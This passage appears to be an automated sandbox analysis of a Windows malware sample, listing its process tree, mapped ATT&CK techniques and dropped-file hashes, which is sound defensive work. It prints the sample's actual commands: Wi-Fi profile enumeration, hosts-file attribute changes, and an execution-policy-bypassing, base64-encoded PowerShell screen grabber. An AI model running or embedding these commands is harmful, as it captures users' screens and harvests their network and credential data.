  - Suspicious behavior: EnumeratesProcesses
  PID:4640
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:1896
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:3092
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:3124
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:1580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2168
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lhuxpudt\lhuxpudt.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1276
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE668.tmp" "c:\Users\Admin\AppData\Local\Temp\lhuxpudt\CSCD571C6E2FCDA474EA497A2BCF3495F79.TMP"
      4⤵
      PID:4884

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
409fe889272d663c5a177220a6d99ead

SHA1
d37e346e6e7525fa51feffdbc49255cb830eaec9

SHA256
a8d79aa0025f70c8dca2609183cbd019d499546a929f61c0ed246f059397f863

SHA512
fae291592925475e2aacafe12383a1ca67e09c8fcaf5880450fd9fe4c318a7ae7eacb910393b9f0ecdbd109ee6ca4acadee7abc56c3f26acb50542b558d158a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE668.tmp

Filesize
1KB

MD5
57232c9585cf1616fd1355586a19a389

SHA1
d48be282ad0c0c7a12a1ef855b0dba653e4cee6f

SHA256
e0f5172605e89c45c74aa377c2b3c5743ebdfa901bb8da290f462446b7a3aa0c

SHA512
3d9735366aa5c785ecee0aaff1d30b9b55a8ff91f193a5b6c08fed4efc96091f72242f2800aa47af994977f2035370f2a0959251545339dcb2cd296adf6cb054

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tizzdlyp.1u4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kr3euvgfZL\Display (1).png

Filesize
403KB

MD5
b0c0e44955427974a124f96454676519

SHA1
98feff8cc1ca8fd63082f66da10809416456e264

SHA256
a9ecd9e16edb0ade0fd9ec0d80b1d861a594ee124de2d0e7f693f20ab8e3ff72

SHA512
eb6c598d84503263fa40d9e1f838ccce219fe4174595bc4478dcfb0051bcb3d31594cab4315cf194580a122e5a1e9a9f6c55d9e5216dcd5df31a5d3564f9002a

Download Submit
C:\Users\Admin\AppData\Local\Temp\lhuxpudt\lhuxpudt.dll

Filesize
4KB

MD5
7a6a6fda3fbf61c1772e1fc9bf4e808e

SHA1
6b5372f81f0defe9dee194a80512b4d4e0a1aa4b

SHA256
29f1627fc66e648199bb69f80426ac3589875b86aa2bd719ef42512e58bc74af

SHA512
0eebe4ce7774ddc6997e4192d2e44823a9191ee190fde1bb442a5e64e396e1629d229f119b812809647bf8bb96a0570ce34c4ba2d452902836212f9f5b65ae1b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
9.5MB

MD5
4b4fd9e69f42cb13de665dc393ca174d

SHA1
6dccc955f9e3ceb435790a93ecd37e9584d07526

SHA256
09d72f61453036336d192add55ec5b538b0d10a8d0901c84a039e2ab18c8bc46

SHA512
7d7c6f2e2f35b35c997a61922b9a4e8d054f79c4a5163f45c07d53ebfc04ad7ebeeb7fa769bdf3712c84654a6994621d2134b890b6b2ec08265802a93e3edb79

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lhuxpudt\CSCD571C6E2FCDA474EA497A2BCF3495F79.TMP

Filesize
652B

MD5
8386bb424db664c7b832651d68514e5a

SHA1
4624139ad98d80c8b485e98111a14b021323a99d

SHA256
b515a374b3679527405184ee9d49f37dd6d45e921a0b9d24562458836bb746b5

SHA512
92d167db23afa0da14e478e63a54236b12d697df5d531010abb28d7317a3ed6a89a0f7c60661d7afe0acb09d84336764616f18251699b6e6d9672a46d0c03765

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lhuxpudt\lhuxpudt.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lhuxpudt\lhuxpudt.cmdline

Filesize
607B

MD5
98576082f2097abf615170565966543a

SHA1
5058c4208f52ec07d0b4d669254bf3ecb394d763

SHA256
9ffcf4da240e0e50119c68dfb323fd292e38917100587f6374ed8134b3b26688

SHA512
17455591a15f1058b359361c55e23e32e27b819692435312cffdf63a102ae906a71c3b0fb1b9bc34cd24216878440b96a4e7ada363668157b647e8c2b7540c25

Download Submit
memory/1256-8-0x000001A47F680000-0x000001A47F6A2000-memory.dmp

Filesize
136KB

Download
memory/2168-60-0x000001F7A2250000-0x000001F7A2258000-memory.dmp

Filesize
32KB

Download